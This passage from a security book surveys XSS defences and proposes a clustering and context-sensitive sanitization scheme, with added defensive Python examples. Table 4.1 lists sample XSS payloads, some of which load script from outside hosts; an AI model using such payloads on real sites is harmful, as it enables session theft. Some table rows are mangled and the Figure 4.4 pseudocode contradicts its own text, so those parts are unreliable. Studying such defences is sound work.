Methodology: A robust technique that effectively eliminates DOM-based XSS attacks. It is based on taint tracking and on reporting exploits to the client. It extracts the untrusted JavaScript code and tests it separately, tracking the flow of its execution to check whether any infection takes place. Using the information from its logs it generates test payloads to verify each XSS vulnerability, and once all vulnerabilities are identified the exploits are reported to the client.
Limitations: It incurs performance overhead and does not provide protection against non-scripting code.

Stock et al. [33]
Methodology: Focuses on identifying the characteristics of suspicious JavaScript code using a taint-tracking browsing system. The response web page is first stored in a cache, HTML content is separated from JavaScript code, the JS code is then examined by the system, and a set of metrics is designed to measure the effect of each attacking flow.
Limitations: Not every type of suspicious flow can be detected, for instance flows that depend on stated conditions such as a URL parameter value.

Xiao et al. [40]
Methodology: Uses dynamic analysis of the JavaScript code embedded in the web page. It builds a JS abstract syntax tree as the internal representation of the JavaScript code and forwards the tree to a taint engine that examines whether the code attempts to gain access to sensitive information.
Limitations: It incurs performance overhead and requires a lot of computational time to perform its functions.

Scholte et al. [31]
Methodology: The authors propose an input validation technique named IPAAS. It intercepts the response web page and fetches all the parameters, then identifies the context (type) of each parameter. This results in the generation of input validation policies, and each subsequent request is examined against these policies; if the conditions are not satisfied, the request is rejected.
Limitations: Type learning can fail in the presence of custom query string formats, in which case the IPAAS parameter extractor might not be able to reliably parse parameter key-value pairs.

Zhang et al. [42]
Methodology: Examines the implementation flow of an AJAX application to detect XSS attacks. Initially, at the browser side, it analyzes the JavaScript code to design a finite state machine for the normal flow of the application. This machine is then embedded into a proxy to monitor the execution flow of each injected script in the response web page; an execution flow that does not match the finite state machine is treated as suspicious and may indicate an XSS attack.
Limitations: It is not effective against DOM-based XSS attacks.

3.5 CHAPTER SUMMARY

As the internet is growing exponentially, it has intertwined into the
daily lives of users as the virtual place where they get faster services
of any kind, anywhere, and at any time. It has been adopted by every
organization across the globe with the aim of expanding its business.
Such proliferation and usability bring several security issues. One of
the most serious concerns is XSS. Therefore, this chapter has focused on
elaborating the fundamentals of XSS attack in a very compact and precise
manner. We have presented the XSS categories with their effects and also
provided information related to the defensive approaches developed by
researchers. Last but not least, XSS cannot go away unless and until
internet users are self-aware about their security and privacy and
software developers develop secure software.
REFERENCES
1. Almomani, A., Gupta, B. B., Wan, T. C., Altaher, A., & Manickam, S.
(2013) Phishing dynamic evolving neural fuzzy framework for online
detection zero-day phishing email. arXiv preprint arXiv:1302.0629.
2. Chaudhary, P., Gupta, B. B., & Gupta, S. (2018). Defending the
OSN-based web applications from XSS attacks using dynamic
javascript code and content isolation. In Quality, IT and Business
Operations (pp. 107–119). Springer, Singapore.
3. Chaudhary, P., Gupta, S., & Gupta, B. B. (2016). Auditing defense
against XSS worms in online social network-based web applica-
tions. In Handbook of Research on Modern Cryptographic Solutions
for Computer and Cyber Security (pp. 216–245). IGI Global.
4. Cross site scripting, OWASP. [online] Available at: https://ww
w.owasp.org/index.php/Cross-site_Scripting (XSS).
5. Dong, G., Zhang, Y., Wang, X., Wang, P., & Liu, L. (2014). Detecting
cross site scripting vulnerabilities introduced by HTML5. In 2014
11th International Joint Conference on Computer Science and
Sofware Engineering (JCSSE). IEEE.
6. Duchene, F., Rawat, S., Richier, J.-L., & Groz, R. (2014).
KameleonFuzz: Evolutionary fuzzing for black-box XSS detection.
In Proceedings of the 4th ACM Conference on Data and Application
Security and Privacy (pp. 37–48). ACM.
7. Guo, X., Jin, S., & Zhang, Y. (2015). XSS vulnerability detection
using optimized attack vector repertory. In 2015 International
Conference On Cyber-Enabled Distributed Computing and
Knowledge Discovery (CyberC). IEEE.
8. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,
Algorithm, Applications, and Perspectives. CRC Press.
9. Gupta, B. B., & Badve, O. P. (2017). Taxonomy of DoS and DDoS
attacks and desirable defense mechanism in a cloud comput-
ing environment. Neural Computing and Applications, 28(12),
3655–3682.
10. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5 code
for halting the DOM-based XSS vulnerabilities in cloud. International
Journal of Cloud Applications and Computing, 7(1), 1–31.
11. Gupta, M. K., Govil, M. C., Singh, G., & Sharma, P. (2015). XSSDM:
Towards detection and mitigation of cross-site scripting vulner-
abilities in web applications. In 2015 International Conference
72 ◾ Cross-Site Scripting Attacks

on Advances in Computing, Communications and Informatics


(ICACCI). IEEE.
12. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
13. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype
method to discover workfow violation and XSS vulnerabili-
ties in PHP web applications. In Proceedings of the 12th ACM
International Conference on Computing Frontiers (p. 59). ACM.
14. Gupta, S., & Gupta, B. B. (2016). JS-SAN: Defense mechanism for
HTML5‐based web applications against JavaScript code injec-
tion vulnerabilities. Security and Communication Networks, 9(11),
1477–1495.
15. Gupta, S., & Gupta, B. B. (2017). Cross-site scripting (XSS)
attacks and defense mechanisms: Classifcation and state-of-the-
art. International Journal of System Assurance Engineering and
Management, 8(1), 512–530.
16. Gupta, S., & Gupta, B. B. (2018). A robust server-side javascript fea-
ture injection-based design for JSP web applications against XSS
vulnerabilities. In Cyber Security (pp. 459–465). Springer, Singapore.
17. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). A client‐server
JavaScript code rewriting-based framework to detect the XSS
worms from online social network. Concurrency and Computation:
Practice and Experience, 31(21), e4646.
18. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). Hunting for DOM-
based XSS vulnerabilities in mobile cloud-based online social net-
work. Future Generation Computer Systems, 79, 319–336.
19. Jain, A. K., & Gupta, B. B. (2017). Phishing detection: Analysis of
visual similarity based approaches. Security and Communication
Networks, 2017.
20. Jiang, F., Fu, Y., Gupta, B. B., Lou, F., Rho, S., Meng, F., & Tian, Z.
(2018). Deep learning based multi-channel intelligent attack detec-
tion for data security. IEEE Transactions on Sustainable Computing.
21. Khan, N., Abdullah, J., & Khan, A. S. (2015). Towards vulnerability
prevention model for web browser using interceptor approach. In
2015 9th International Conference on IT in Asia (CITA). IEEE.
22. Lalia, S., & Sarah, A. (2018, March). XSS attack detection approach
based on scripts features analysis. In World Conference on
Information Systems and Technologies (pp. 197–207). Springer,
Cham.
Fundamentals of Cross-Site Scripting (XSS) Attack    ◾   73

23. Lekies, S., Stock, B., & Johns, M. (2013). 25 million fows later:
Large-scale detection of DOM-based XSS. In Proceedings of the
2013 ACM SIGSAC Conference on Computer & Communications
Security. ACM.
24. Mokbal, F. M. M., Dan, W., Imran, A., Jiuchuan, L., Akhtar, F.,
& Xiaoxi, W. (2019). MLPXSS: An integrated XSS-based attack
detection scheme in web applications using multilayer perceptron
technique. IEEE Access, 7, 100567–100580.
25. Moniruzzaman, M., Bagirov, A., Gondal, I., & Brown, S. (2018,
June). A server side solution for detecting WebInject: A machine
learning approach. In Pacifc-Asia Conference on Knowledge
Discovery and Data Mining (pp. 162–167). Springer, Cham.
26. Nadji, Y., Saxena, P., & Song, D. (2009, February). Document
structure integrity: A robust basis for cross-site scripting defense.
In NDSS.
27. Panja, B., Gennarelli, T., & Meharia, P. (2015). Handling cross site
scripting attacks using cache check to reduce webpage rendering
time with elimination of sanitization and fltering in light weight
mobile web browser. In 2015 First Conference on Mobile and Secure
Services (MOBISECSERV). IEEE.
28. Parameshwaran, E. B., Shinde, S., Dang, H., Sadhu, A., & Saxena, P.
(2015). DexterJS: Robust testing platform for DOM-based XSS vulner-
abilities. In Proceedings of the 2015 10th Joint Meeting on Foundations
of Sofware Engineering (ESEC/FSE 2015) (pp. 946–949). ACM.
29. Rocha, T. S., & Souto, E. (2014). ETSSDetector: A tool to automati-
cally detect cross-site scripting vulnerabilities. In 2014 IEEE 13th
International Symposium on Network Computing and Applications
(NCA). IEEE.
30. Ruse, M. E., & Basu, S. (2013). Detecting cross-site scripting vulner-
ability using concolic testing. In 2013 Tenth International Conference
on Information Technology: New Generations (ITNG). IEEE.
31. Scholte, T., Robertson, W., Balzarotti, D., & Kirda, E. (2012).
Preventing input validation vulnerabilities in web applications
through automated type analysis. In 2012 IEEE 36th Annual
Computer Software and Applications Conference (COMPSAC). IEEE.
32. Steinhauser, A., & Tůma, P. (2019). DjangoChecker: Applying
extended taint tracking and server side parsing for detection of
context-sensitive XSS flaws. Software: Practice and Experience,
49(1), 130–148.
33. Stock, B., Pfistner, S., Kaiser, B., Lekies, S., & Johns, M. (2015). From
facepalm to brain bender: Exploring client-side cross-site scripting.
In Proceedings of the 22nd ACM SIGSAC Conference on Computer
and Communications Security (CCS '15) (pp. 1419–1430). ACM.
34. Tripathi, S., Gupta, B., Almomani, A., Mishra, A., & Veluru, S.
(2013). Hadoop based defense solution to handle distributed denial
of service (ddos) attacks. Journal of Information Security, 04(3), 150.
35. Van Acker, S., Nikiforakis, N., Desmet, L., Joosen, W., & Piessens,
F. (2012). FlashOver: Automated discovery of cross-site scripting
vulnerabilities in rich internet applications. In Proceedings
of the 7th ACM Symposium on Information, Computer and
Communications Security (pp. 12–13). ACM.
36. Vishnu, B. A., & Jevitha, K. P. (2014). Prediction of cross-site script-
ing attack using machine learning algorithms. In Proceedings of
the 2014 International Conference on Interdisciplinary Advances in
Applied Computing (ICONIAAC '14). ACM.
37. Wang, R., Jia, X., Li, Q., & Zhang, D. (2015). Improved N-gram
approach for cross-site scripting detection in Online Social
Network. In 2015 Science and Information Conference (SAI). IEEE.
38. Wang, R., Jia, X., Li, Q., & Zhang, S. (2014). Machine learning
based cross-site scripting detection in online social network.
In 2014 IEEE International Conference on High Performance
Computing and Communications, 2014 IEEE 6th International
Symposium on Cyberspace Safety and Security, 2014 IEEE 11th
International Conference on Embedded Software and Syst (HPCC,
CSS, ICESS). IEEE.
39. Wang, R., Xu, G., Zeng, X., Li, X., & Feng, Z. (2018). TT-XSS: A
novel taint tracking based dynamic detection framework for DOM
cross-site scripting. Journal of Parallel and Distributed Computing,
118, 100–106.
40. Xiao, W., Sun, J., Chen, H., & Xu, X. (2014). Preventing client side
XSS with rewrite based dynamic information flow. In 2014 Sixth
International Symposium on Parallel Architectures, Algorithms and
Programming (PAAP). IEEE.
41. XSS incidents information. [online] Available at: http://www.xssed.com/.
42. Zhang, Q., Chen, H., & Sun, J. (2010). An execution-flow based
method for detecting cross-site scripting attacks. In 2010 2nd
International Conference on Software Engineering and Data
Mining (SEDM). IEEE.
CHAPTER 4

Clustering and Context-Based Sanitization Mechanism for Defending against XSS Attack

The XSS attack is the only web application vulnerability that has been identified during static testing as well as during dynamic testing of web applications. This provides an estimate of how prevalent and dangerous this attack can be. Therefore, in this chapter, we propose an approach that assists in defending against the XSS attack. Basically, it is based on a context-based sanitization method applied to malicious scripts. We have optimized its performance by implementing clustering on the scripts. Let's discuss this approach in detail.

4.1 INTRODUCTION
When we think about the internet, it means a market for several web applications that may correspond to different sectors or businesses such as e-commerce, manufacturing, telecom, education, and many more [10, 12]. However, the most dominant and popular web application is the social network. Social media has taken the usage of the internet to another level. Now, everyone is connected to their loved ones either personally or professionally via a single network. But not every person is good; such a network also attracts malicious actors like fraudsters, attackers, and online predators. Social media has become a platform that hosts several vulnerabilities and attacks [24, 30]. The XSS attack is a highly exploited vulnerability that helps in triggering other dangerous attacks like DoS. Therefore, researchers have developed techniques for mitigating XSS [5, 6, 11, 13, 19]. Input validation and sanitization are considered to be the first and foremost defensive measures for mitigating the effects of XSS worms on web application platforms [5]. Nevertheless, these techniques incur a high performance overhead. Therefore, this chapter presents an approach based on clustering and context-based sanitization to thwart the XSS attack on social media. This approach utilizes some basic mechanisms to achieve its functionality. Hence, in the following subsections, we discuss the preliminaries required to understand the working of the proposed approach.

4.1.1 Views
Views can be understood as the working interface for the current user of the web application for the requested action. Actually, it is a sandboxed thread that implements a portion of the web application. At the browser end, it appears as the web page or a part of it. It is used to secure the other ongoing processes on the system. For instance, on social media, commenting on posts may be considered a different view from the remaining web page. It helps us in processing the user request in isolation from other parts of the web application. Hence, the view aids in enhancing the security of the web application.

4.1.2 Access Control List (ACL)
An ACL is a list prepared to control access to the information within a system. It is prepared according to the privileges granted to the users of the system. In a nutshell, it performs action authentication; i.e., it checks whether the user is authorized to perform the requested action or not. Actions are the tasks executed by a view. For example, an action may originate from a view, say "V", to post a comment in V's comment area. Precisely, we can regard actions as the privileges given to a view to act accordingly. The ACL contains entries of the form <User ID, privileges>, as shown below; User ID denotes the user's cookie information, and privileges denote the actions that may be performed by the user corresponding to that User ID. Finally, the ACL is maintained and controlled at the client side for the authentication of each action.

User ID    Privileges
<1>        Read, Write, Update

4.1.3 Context-Based Sanitization
Sanitization is a method to validate the untrusted user input as per the format specified by the web application. Multiple sanitization techniques have been proposed in the literature, but very few have focused on sanitization according to the context of the injected script. Context-sensitive sanitization applies a sanitizer to each untrusted variable (i.e., dynamic content like JavaScript) according to the context in which it is used. There may be different contexts present in an HTML document, such as element tag, attribute value, style sheet, script, anchors, href, etc. These contexts may be used by the attacker to launch an XSS attack.
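
As an added illustration of context-sensitive sanitization (example code written for this edit, not the book's Java implementation), the following Python snippet escapes the same untrusted comment differently for the HTML body, a quoted attribute, a JavaScript string literal, a URL query parameter and a CSS string, and applies a scheme allow-list to an untrusted URL used whole in href. The context names, function names and the sample comment are this example's own; the escaping rules follow standard per-context output encoding rather than any routine from the book.

```python
"""Context-sensitive sanitization of an untrusted value (added example, not the book's code).

The same user-supplied string is escaped differently depending on the HTML
context it is inserted into; one escaper is not safe in every context.
Context names, function names and the sample comment are this example's own.
"""
import html
import urllib.parse

# Contexts this example distinguishes (a subset of the contexts in Table 4.2).
HTML_BODY = "html_body"      # text between tags
HTML_ATTR = "html_attr"      # value of a quoted attribute
JS_STRING = "js_string"      # inside a quoted JavaScript string literal
URL_QUERY = "url_query"      # one query-string parameter value
CSS_STRING = "css_string"    # inside a quoted CSS string


def _is_safe_ascii(ch: str) -> bool:
    return ch.isalnum() and ord(ch) < 128


def _escape_html_attr(value: str) -> str:
    # Every character except ASCII letters/digits becomes a numeric entity, so the
    # value cannot close the quote or the tag whichever quote style the page used.
    return "".join(ch if _is_safe_ascii(ch) else "&#x%X;" % ord(ch) for ch in value)


def _escape_js_string(value: str) -> str:
    # \xHH for the Latin-1 range, \uHHHH above it; this neutralizes quotes and </script>.
    out = []
    for ch in value:
        if _is_safe_ascii(ch):
            out.append(ch)
        elif ord(ch) < 256:
            out.append("\\x%02X" % ord(ch))
        else:
            out.append("\\u%04X" % ord(ch))
    return "".join(out)


def _escape_css_string(value: str) -> str:
    # CSS escape: backslash, hex code point, then a space so the escape ends unambiguously.
    return "".join(ch if _is_safe_ascii(ch) else "\\%X " % ord(ch) for ch in value)


def sanitize(value: str, context: str) -> str:
    """Apply the escaper that matches the context in which `value` will be used."""
    if context == HTML_BODY:
        return html.escape(value, quote=True)
    if context == HTML_ATTR:
        return _escape_html_attr(value)
    if context == JS_STRING:
        return _escape_js_string(value)
    if context == URL_QUERY:
        return urllib.parse.quote(value, safe="")
    if context == CSS_STRING:
        return _escape_css_string(value)
    raise ValueError("unknown context: %r" % context)


def safe_href(url: str) -> str:
    """An untrusted URL used whole in href/src needs a scheme allow-list, not just escaping."""
    url = url.strip()
    scheme = urllib.parse.urlparse(url).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"        # only absolute http(s) URLs pass; javascript:, data: etc. are refused
    return html.escape(url, quote=True)


def render_comment(comment: str) -> str:
    """Place one untrusted comment into four contexts, each with its own escaper."""
    return (
        '<div title="%s">%s</div>'
        '<a href="/site/search?value=%s">search</a>'
        '<script>var c = "%s";</script>'
        % (sanitize(comment, HTML_ATTR), sanitize(comment, HTML_BODY),
           sanitize(comment, URL_QUERY), sanitize(comment, JS_STRING))
    )


if __name__ == "__main__":
    # Constructed sample: a comment that tries to break out of each context.
    print(render_comment("\"><script>alert('XSS')</script>"))
    print(safe_href("javascript:alert('XSS')"))
```

The point of `render_comment` is that a body-escaped value dropped into the JavaScript string context, or vice versa, would still be exploitable; each placement must pick its own sanitizer, which is what the chapter's sanitization engine does per template.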

4.2 PROPOSED APPROACH
In this section, we discuss our approach in detail. This approach not only detects complete script injection but also detects partial script injection. Let's have a look at the abstract design model of this approach.

4.2.1 Abstract Design
The proposed approach is a view-separation and clustering-based context-sensitive sanitization technique. In addition, it is a client-server technique that aims to protect each view of the web application from the XSS attack. This is done through the identification of partial JavaScript injection (i.e., modification of an existing script to inject malicious parameters) along with entire JavaScript matching. This method prevents the attacker from gaining access to any view. Moreover, the attacker cannot steal the sensitive information related to that view, like the session token, cookie information, or any other personal information of the user who is authenticated for that view.
It consists of two phases: the training phase and the recognition phase. In the former phase, the web application is partitioned into all possible views and the ACL is trained to learn all the privileges/rights a particular view can obtain. The latter phase initially identifies all the injection points in the generated view corresponding to each extracted HTTP request at the server side. Secondly, at the client side, the recognition phase performs an action authentication to certify whether the corresponding view possesses the capability to perform that action or not. If an action is authenticated, then the request is granted and the approach discovers the malicious XSS attack worm at each extracted injection point of the web application. It then executes a comparative string matching algorithm for identifying partial script injection, together with clustering to generate a compressed template of the XSS attack. Finally, the clustered templates are sanitized by applying the sanitizer routine matching the context, and the result is displayed to the online user. Otherwise, the request is denied. Figure 4.1 illustrates the abstract view of our proposed approach.
Table 4.1 highlights some of the HTML features used to inject the XSS vector into the web application.

4.2.2 Detailed Design
This section provides a comprehensive overview of the proposed approach. It shows how the different modules interact with each other. Figure 4.2 depicts the micro view of the abstract design with all the inner modules [5].

FIGURE 4.1 Abstract design view of the proposed approach.

TABLE 4.1 Suspicious HTML Elements
Type     Context                                    Code Sample
String   HTML Body                                  <span>alert(“document.cookie”);</span>
String   Safe HTML Attributes                       <input type="text" name="fname" src="attack_malicious URL">
String   GET Parameter                              <a href="/site/search?value=" http://ha.ckers.org/xss.js”>clickme</a>
String   Untrusted URL in a SRC or HREF attribute   <a href=" http://ha.ckers.org/xss.js ">clickme</a><iframe src=" javascript:alert('XSS');" />
String   CSS Value                                  <div>Selection</div>
String   JavaScript Variable                        <script>var currentValue= document.write("<SCRI");</script><script>someFunction('http://ha.ckers.org/xss.js"');</script>
HTML     HTML Body                                  <div>>@import'http://ha.ckers.org/xss.css';</div>
String   DOM XSS                                    <script>document.write(“22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)<script/>

This approach comprises two phases: the training phase and the recognition phase. Let's have a look at the working of each of these phases.

4.2.2.1 Training Phase
In this phase, all possible views of the web application are generated to prepare the ACL that contains all actions that a particular view can implement. In this phase, we learn all the actions/privileges that a view can perform by sending HTTP requests. The ACL provides the information as to which view can originate what kind of actions. This phase must be done carefully, as the efficiency of action authentication depends on it. If the ACL includes all actions of which a view is capable, then, in the recognition phase, the action authentication operation can be accomplished efficiently.

FIGURE 4.2 Detailed design view of the proposed approach.

4.2.2.2 Recognition Phase
It is the most important phase, as XSS attack detection is achieved here by utilizing the capabilities of the ACL prepared during the training phase, followed by the clustering-based context-sensitive sanitization process. It performs the following steps:

• When the server receives the request from the user, it is forwarded to the session manager. Here, it is mapped to the stored session corresponding to the user's cookie information (i.e., the user's login credentials).
• The request is processed to check whether it alters the server content or not, for example, a request to post a comment. If it does not modify the content, then the server generates the static web page and returns it to the browser.
• Otherwise, the web application is split into multiple views. The URL mapper handles the mapping of the URL to its corresponding view. As a result, it is capable of forwarding the request to the particular view that will process it.
• Depending upon the request, the corresponding view is extracted via the view handler and returned to the browser as the response.

The above four steps are executed at the server side. The steps implemented at the client side are illustrated below:

• When the browser retrieves the response, it is first parsed by the HTML parser and lexer. The parsed document is processed by the document generator to render the web content. Finally, it is processed by the action authenticator to check, with the help of the ACL, whether the action can be completed or not. If the action is not authenticated, then it means the attacker is trying to breach the view privileges and launch the XSS attack. Therefore, the action cannot be completed; i.e., access is denied.
• It discovers the malicious XSS attack vectors present at all the hidden injection points. It applies a comparative string matching algorithm to the extracted attack vectors to identify partial script injection by utilizing the XSS attack vector repository.
• Clustering is applied to the malicious scripts to produce compressed templates. Finally, it sanitizes these clustered templates by applying the sanitization primitives depending on the matching context. After the successful sanitization of each template, these are injected into the document and the final HTML document is displayed to the user.

Figure 4.3 presents the working flow chart of the proposed approach.

FIGURE 4.3 Flow chart of the proposed approach.

4.2.3 Key Modules
In this section, we discuss the key modules involved in the working of the proposed approach. The modules are:

• Session Supervisor: It is used to store the session corresponding to the user login credentials for mapping the user cookie to the stored session. It is responsible for controlling and monitoring the stored sessions. Basically, it stores and maps the information given to the server at the time of registration/login. It keeps track of all the activities accomplished by the user during the time period of a particular session. Therefore, it can be utilized to monitor all the activities of a particular user.
• URL Synchronizer: It performs synchronization of the requested URL to the view that is responsible for processing the request. It is also responsible for the generation of the views on the basis of the requested URL.
• View Manager: It is responsible for the extraction of the requested view and returns it to the browser as the response. It also extracts the view corresponding to each extracted request.
• Injection Point Identifier: This component is responsible for the identification of injection points in the response web page where an attacker may inject malicious code to launch the XSS attack. This is achieved by monitoring all the malicious contexts in the document with the help of the HTML malicious context directory.
• HTML Parser: This component acts at the client side and is the first module that receives the HTML document generated as the response by the server. Its key goal is to construct a parse tree, i.e., the Document Object Model (DOM). It is the method by which the browser interprets the document and displays it to the user. During the parsing phase, the executable script nodes are determined and nodes are created for them in the parse tree. In addition, the data nodes are also created in this component. Finally, this tree is passed to the document generator and the HTML parsing is complete.
• HTML Content Separator: It stores and processes the web content represented by the parse tree. It basically performs the separation of the content and gives it to the other parts of the browser for rendering. For example, the scripting code is supplied to the JavaScript parser for processing.
• Action Authenticator: It checks the authenticity of the action. It is responsible for determining whether the view is capable of performing the action or not, i.e., whether it has the capability to execute the action. Action authentication is done with the help of the ACL prepared during the training phase. To check the action's authenticity, the action authenticator uses the User ID to find the corresponding entry in the ACL. If the User ID matches an entry in the ACL, then it checks the privileges attached to it against the originated action. If the action matches the privileges, then it is authenticated. Otherwise, it means that some adversary is trying to breach the security of the view by injecting some XSS attack vector into the view.
• Script Extractor: It is responsible for the detection of malicious XSS attack payloads present at the identified injection points. It retrieves all attack vectors corresponding to the different contexts shown in Table 4.2 [29]. Extracted attack vectors (say AV) are matched with the stored malicious scripts (AS) in the XSS attack vector repository. This is achieved with the help of a comparative string matching algorithm. If AV is larger than AS, then the stored script is searched for within the extracted attack vector to detect entire script injection. On the other hand, if AS is larger than AV, then the extracted attack vector is searched for within the stored scripts to discover partial script injection.

TABLE 4.2 List of HTML Elements and Their Contexts
Elements                      Context
HTML                          PCDATA, RCDATA, Tag Name, ATTRIBNAME
HTMLATTRIB                    Quoted, Unquoted
JavaScript                    String, REGEX
Cascading Style Sheet (CSS)   ID, Class, PROPNAME, KEYWDVAL, QUANT, String, Quoted URL, Unquoted URL
URL                           Start, Query, General
• Clustered Scripts Template Generator: This component implements an algorithm (shown in Figure 4.4) for clustering the extracted attack vector payloads depending on their similarity ratio. Consequently, a clustered template is generated that describes the attack vectors in compressed form by using a distance-based clustering algorithm [3]. Consider the example shown below:

<script>alert(48a$bc);</script>
<script>alert(48xv&ez);</script>

These scripts only differ by their argument value. In this view, a compressed template is generated by applying the proposed algorithm as shown in Figure 4.6. A template is a string produced from several types of lexical tokens that are common to each attack vector payload in a cluster, along with the variable portion, represented by placeholders. The similarity matrix is calculated by using the algorithm discussed in [22]. N- is used as a substitute for numbers and S- as a substitute for alphanumeric characters. Thus, the template for the above set of scripts is denoted as:

<script>alert(48-S-);</script>

The input to the algorithm is TAV_Rep, which contains the list of extracted attack vectors. In each iteration, it compares a pair of attack vectors AX and AX+1 and then uses the Levenshtein distance (VX) to generate the templates. It is defined as the minimum number of single-character deletions, insertions, or substitutions required to convert one string into the other. If VX is less than a selected threshold (α), then the similar characters between the pair of attack vectors AX and AX+1 are extracted. Non-similar characters are replaced by the placeholders (N/S). Otherwise, the pair is discarded and another pair is selected for comparison. The final output is the clustered template, as shown in the above example. The generated template T is stored in C_Rep for further processing.

Algorithm: Template generator
Input: Malicious attack vector payloads
Output: Clustered template of attack vector payloads
Threshold (α) := 0;
Start
    TAV_Rep ← list of traversed attack vectors;
    C_Rep ← NULL;
    VX ← 0;
    For Each attack vector AX ∈ TAV_Rep
        Compare(AX, AX+1);
        VX ← Levenshtein_distance(AX, AX+1);
        If (VX > α)
            Accept(AX, AX+1);
            Generate template T ∈ (AX, AX+1);
            C_Rep ← T ∪ C_Rep;
        End If
        Else
            Discard(AX, AX+1);
            Select other pair (AX+1, AX+2);
        End Else
    End For Each
    Return C_Rep
End

FIGURE 4.4 Algorithm for clustered template generation.

• Context-Based Sanitizer: Sanitization is a process for substituting the untrusted user variable with the sanitized variable. The clustered script templates are sanitized according to the context in which they are used in the HTML document. In addition, the same clustering algorithm is applied to the sanitized templates of the malicious XSS attack vectors. Figure 4.5 describes the proposed algorithm used by the context-sensitive sanitization engine to sanitize the templates. This algorithm works as follows: a log, SR_log, is maintained, which includes the sanitizer routines used for the sanitization. VU is an array used to hold the untrusted variables. VS denotes an array used to hold the sanitized variables. C_Rep stores the list of the clustered templates and SCLU_Rep is used to store the sanitized clustered templates. For every template TI retrieved from C_Rep, the algorithm searches for the untrusted variable and stores it in VU to determine the context (CI), and then applies the sanitizer (SI) according to the context in which VU is used. The sanitized variable is stored in VS and then appended to SR_log for a more effective result. After sanitization of each template in C_Rep, we apply the clustering algorithm shown in Figure 4.4 to the sanitized template array SR_log and store the sanitized clustered templates in SCLU_Rep. All the sanitized variables are then injected into the HTML document at their respective locations and the modified HTML document is displayed to the user.
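
As an added example (written for this edit, not the book's Java implementation), the following Python code reproduces two client-side steps from the key modules above: the Script Extractor's comparative string matching (entire versus partial script injection) against a constructed attack vector repository, and the clustered template generation of Figure 4.4 using Levenshtein distance and the N/S placeholders on the two scripts shown earlier. The repository contents, the MIN_FRAGMENT and alpha values, and the "-N-"/"-S-" placeholder spelling are this example's own choices; a pair is clustered when its distance is below the threshold, as the text describes.

```python
"""Matching and clustering of extracted attack vectors (added example, not the book's code).

classify_injection() is the Script Extractor's comparative string matching
against a repository of stored scripts; generate_templates() is the clustering
of Figure 4.4, collapsing consecutive attack vectors whose Levenshtein distance
is below a threshold into one template with -N-/-S- placeholders.
The repository, threshold and sample vectors below are constructed for the example.
"""
import difflib
import re

# Constructed stand-in for the XSS attack vector repository (the stored scripts, AS).
ATTACK_VECTOR_REPO = [
    "<script>alert(48a$bc);</script>",
    "<img src=x onerror=alert(1)>",
]
MIN_FRAGMENT = 8   # example's own choice: ignore tiny fragments to limit false partial matches


def normalize(script: str) -> str:
    """Case-fold and collapse whitespace so trivial rewriting does not defeat the match."""
    return re.sub(r"\s+", " ", script.strip()).lower()


def classify_injection(extracted: str, repo=ATTACK_VECTOR_REPO):
    """Return ("entire", stored), ("partial", stored) or (None, None).

    If the extracted vector AV is at least as long as a stored script AS, AS is
    searched inside AV (entire script injection). Otherwise AV is searched inside
    AS (partial script injection, i.e. a fragment of a known script).
    """
    av = normalize(extracted)
    if len(av) < MIN_FRAGMENT:
        return None, None
    for stored in repo:
        as_ = normalize(stored)
        if len(av) >= len(as_):
            if as_ in av:
                return "entire", stored
        elif av in as_:
            return "partial", stored
    return None, None


def levenshtein(a: str, b: str) -> int:
    """Minimum number of single-character insertions, deletions or substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def make_template(a: str, b: str) -> str:
    """Keep the runs common to both vectors; replace each differing run by a placeholder.

    -N- stands for a run that is numeric in both vectors, -S- for any other run.
    """
    parts = []
    for tag, i1, i2, j1, j2 in difflib.SequenceMatcher(None, a, b).get_opcodes():
        if tag == "equal":
            parts.append(a[i1:i2])
        else:
            ra, rb = a[i1:i2], b[j1:j2]
            parts.append("-N-" if ra.isdigit() and rb.isdigit() else "-S-")
    return "".join(parts)


def generate_templates(vectors, alpha: int):
    """Figure 4.4 over a list of traversed attack vectors (TAV_Rep); returns C_Rep."""
    c_rep = []
    for ax, ax1 in zip(vectors, vectors[1:]):      # consecutive pairs (AX, AX+1)
        if levenshtein(ax, ax1) < alpha:          # close enough: same cluster
            template = make_template(ax, ax1)
            if template not in c_rep:
                c_rep.append(template)
        # otherwise the pair is discarded and the loop moves on to (AX+1, AX+2)
    return c_rep


if __name__ == "__main__":
    sample = [                                    # constructed TAV_Rep
        "<script>alert(48a$bc);</script>",
        "<script>alert(48xv&ez);</script>",
        "<img src=x onerror=alert(1)>",
    ]
    print(classify_injection("<img SRC=x onerror=alert(1)>"))
    print(generate_templates(sample, alpha=8))
```

The book's two sample scripts collapse to `<script>alert(48-S-);</script>`, exactly the template given in the text; the unrelated third vector is far beyond the threshold and is discarded rather than folded into the cluster.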

4.3 EXPERIMENTAL TESTING AND EVALUATION RESULTS
In this section, we discuss the implementation details of our proposed approach to thwart the XSS attack on social networking platforms. We also analyze the performance of our approach by testing it on five real-world social media platforms, including Elgg [8], Humhub [17], WordPress [28], Drupal [7], and Joomla [18]. Additionally, we compare our proposed approach with existing state-of-the-art techniques on the basis of some performance evaluation parameters.

Algorithm: Context-sensitive sanitization engine
Input: Set of clustered script templates (T1, T2, T3, … TN).
Output: Sanitized attack vector templates
Start
    SR_log ← list of externally available sanitizer routines (S1, S2, … SN);
    C_Rep ← set of clustered script templates;
    SCLU_Rep ← NULL;
    VU ← ∅;
    VS ← ∅;
    For Each template TI ∈ C_Rep
        Remove placeholders (N/S) ∈ TI;
        VU ← untrusted-variable(TI);
        CI ← Context(VU);
        SI ← (S ∈ SR_log) ∩ (S matches CI);
        VS ← SI(TI);
        SR_log ← VS ∪ SR_log;
    End For Each
    For Each SI ∈ SR_log
        SCLU_Rep ← Template-generator(SI);
    End For Each
